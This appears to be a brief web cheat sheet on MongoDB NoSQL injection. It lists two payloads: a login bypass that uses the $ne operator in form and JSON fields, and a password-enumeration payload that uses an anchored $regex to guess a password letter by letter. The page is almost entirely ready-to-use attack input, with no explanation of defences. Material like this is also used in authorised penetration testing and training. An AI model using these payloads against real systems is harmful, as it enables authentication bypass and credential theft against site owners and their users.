Skip to content

NoSQL Injection

MongoDB Injection

Login Bypass

username=admin&password[$ne]=anything

{"username": "<username>", "password": {"$ne": "<anything>"}}

Enumerate Password

{"username": "<username>", "password": {"$regex": "^<check_letter>"}}